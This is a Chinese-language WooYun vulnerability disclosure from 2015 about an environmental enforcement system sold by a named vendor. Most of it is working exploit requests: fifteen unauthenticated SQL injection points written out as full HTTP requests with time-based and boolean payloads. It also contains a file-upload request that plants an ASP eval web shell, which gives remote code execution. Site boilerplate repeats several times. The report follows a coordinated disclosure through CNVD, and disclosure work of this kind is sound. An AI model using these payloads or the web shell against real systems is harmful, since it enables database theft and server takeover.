某执法系统存在通用型15处SQL注入DBA权限&一处无限制getshell(都无需登录)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131917

漏洞标题：某执法系统存在通用型15处SQL注入DBA权限&一处无限制getshell(都无需登录)

漏洞作者： YY-2012

提交时间：2015-08-08 15:19

修复时间：2015-11-08 14:46

公开时间：2015-11-08 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-08：细节已通知厂商并且等待厂商处理中
2015-08-10： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-13：细节向第三方安全合作伙伴开放
2015-10-04：细节向核心白帽子及相关领域专家公开
2015-10-14：细节向普通白帽子公开
2015-10-24：细节向实习白帽子公开
2015-11-08：细节向公众公开

简要描述：

15个文件26个参数注入参数&一处无限制getshell

详细说明：

“中科宇图天下科技有限公司”的“环境监察移动执法系统”涉及所有版本都存在同样注入和getshell问题。
案例：

**.**.**.**:8080/
**.**.**.**:8888/
**.**.**.**:8888/
**.**.**.**:8080/
**.**.**.**:8080/
**.**.**.**:8080/

漏洞证明：

第一处：

**.**.**.**:8080/taskexecute/ajaxcjd.aspx?taskid=-1'%20OR%203*2*1%3d6%20AND%2000084%3d00084%20--

参数taskid
第二处：

POST /taskexecute/ajax_xwjl.aspx?view=addModify HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=rrz2ij45fop5zb55ayqqef45; BAIDUID=DAECAC73B118020722818EB98BF8746B:FG=1
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 
Safari/537.21
Accept: */*
bxwr=%C2%A0&gzdw=%C2%A0&taskid=1';WAITFOR DELAY '0:0:30'--&wd=%C2%A0%EF%BC%9A%C2%A0%EF%BC%9B%C2%A0%EF%BC%9A%C2%A0%EF%BC%9B%C2%A0%EF%BC%9A%C2%A0%EF%BC%9B&xwblid=&ybagx=%C2%A0

参数taskid
第三处：

POST /TaskExecute/SceneRecord_LN/BaseLawHandler.ashx HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Type=InsertWRLX&WFLX=5pfS4Meb');%20waitfor%20delay%20'0:0:0'%20--%20

参数WFLX

POST /TaskExecute/SceneRecord_LN/BaseLawHandler.ashx HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ID=-1;%20waitfor%20delay%20'0:0:0'%20--%20&Type=DeleteWFXW

参数ID
第四处：

**.**.**.**:8080/TaskExecute/SceneRecord_LN/XWBL_Handler.ashx?EntId=mrAZne8y';%20waitfor%20delay%20'0:0:0'%20--%20&TaskId=&Type=Law

参数TaskId和参数EntId
第五处：

**.**.**.**:8080/TaskManager/ShowFileHandler.aspx?filename=&id=s19uKQUL';%20waitfor%20delay%20'0:0:0'%20--%20

参数id
第六处：

POST /WebService/ArcGisDataWebService.asmx/GetGridEntData HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
GridCode=94102&IsPage=20&IsSP=1&IsYS=1&PageIndex=20&PageSize=20&SCZT=UI68J8qi';%20waitfor%20delay%20'0:0:0'%20--%20&SFZDY=1&strEntName=smevudsa&tradeCatogry=1&X=1&Y=1

参数SCZT，SFZDY，strEntName，tradeCatogry
第七处：

POST /WebService/ArcGisDataWebService.asmx/getHistoryData HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
endDate=01/01/1967&startDate=01/01/1967&userid=-1'%20OR%203*2*1%3d6%20AND%20000794%3d000794%20--%20

参数userid
第八处：

POST /WebService/ArcGisDataWebService.asmx/GetParEntInfoData HTTP/1.1
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
IsSP=1&IsYS=1&PntX=1&PntY=1&SCZT=1&SFZDY=1&tradeCatogry=-1'%20OR%203*2*1%3d6%20AND%20000349%3d000349%20--%20

参数tradeCatogry
第九处：

POST /WebService/ArcGisDataWebService.asmx/getRealData HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
userid=-1'%20OR%203*2*1%3d6%20AND%20000372%3d000372%20--%20

参数：userid
第十处：

POST /WebService/MobileEnforcementWebService.asmx/GetTaskStatisticsInfo HTTP/1.1
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
departType=-1'%20OR%203*2*1%3d6%20AND%2000089%3d00089%20--%20&endTime=1&regionCode=94102&startTime=1&taskType=1&token=1

参数departType和参数regionCode
第十一处：

POST /WebService/MobileEnforcementWebService.asmx/GetVersionScriptList HTTP/1.1
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
token=1&versionNum=RBnxEM6G');%20waitfor%20delay%20'0:0:0'%20--%20

参数：versionNum
第十二处：

POST /WebService/MobileEnforcementWebService.asmx/InsertMobileLogInfo HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
_Log=1&_PDAMac=1&_Version=oksOzi8f');%20waitfor%20delay%20'0:0:0'%20--%20

参数_Version
第十三处：

POST /WebService/MobileEnforcementWebService.asmx/PDAAuth HTTP/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
_PDAMac=6wIsKJZx';%20waitfor%20delay%20'0:0:0'%20--%20

参数_PDAMa
第十四处：

POST /WebService/MobileEnforcementWebService.asmx/PDARegister HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
_PDAMac=bJStF5Vp';%20waitfor%20delay%20'0:0:0'%20--%20&_PDAName=sqtvhkat

参数_PDAMac
第十五处：

POST /WebService/MobileEnforcementWebService.asmx/UploadUserBaiduPushXX HTTP/1.1
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:8080/
Cookie: ASP.NET_SessionId=4wfqzm45dscswyjobiololur; BAIDUID=EA54D7C4604649AB20FA4F715CFE39E1:FG=1; ASPSESSIONIDASAQARBT=CLIFBJNAOLHCCDAMGKNLICJJ
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
channelID=YRRMduLJ';%20waitfor%20delay%20'0:0:0'%20--%20&sysUserID=gedwgsbu&token=1&yunUserID=gedwgsbu

参数channelID，参数sysUserID和参数yunUserID

一处无限制getshell：

**.**.**.**:8888/taskexecute/sceneyst.aspx

POST /Uploadify.ashx HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
User-Agent: Shockwave Flash
Host: **.**.**.**:8080
Content-Length: 1858
Pragma: no-cache
Cookie: ASP.NET_SessionId=e0ogvkmiihaeu045nmnzuszq
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="Filename"
1.asp
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="fileext"
*.asp
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="FK_Id"
_
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="folder"
/Attach/RWZX/
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="cmd"
RWZX_ADD_FILES
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="Filedata"; filename="1.asp"
Content-Type: application/octet-stream
<%eval request("pass")%>
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7
Content-Disposition: form-data; name="Upload"
Submit Query
------------GI3ei4ei4GI3Ij5KM7Ef1Ef1gL6KM7--

修复方案：

联系厂商。

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-08-10 14:44

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过软件生产厂商（或网站管理方）公开联系渠道向其邮件（和电话）通报，由其后续提供修复方案。同时，将相关案例下发给对应的CNCERT分中心，由其后续协调网站管理单位处置．

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131917

漏洞标题：某执法系统存在通用型15处SQL注入DBA权限&一处无限制getshell(都无需登录)

相关厂商：中科宇图天下科技有限公司

漏洞作者： YY-2012

提交时间：2015-08-08 15:19

修复时间：2015-11-08 14:46

公开时间：2015-11-08 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131917

漏洞标题：某执法系统存在通用型15处SQL注入DBA权限&一处无限制getshell(都无需登录)

相关厂商：中科宇图天下科技有限公司

漏洞作者： YY-2012

提交时间：2015-08-08 15:19

修复时间：2015-11-08 14:46

公开时间：2015-11-08 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0131917"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：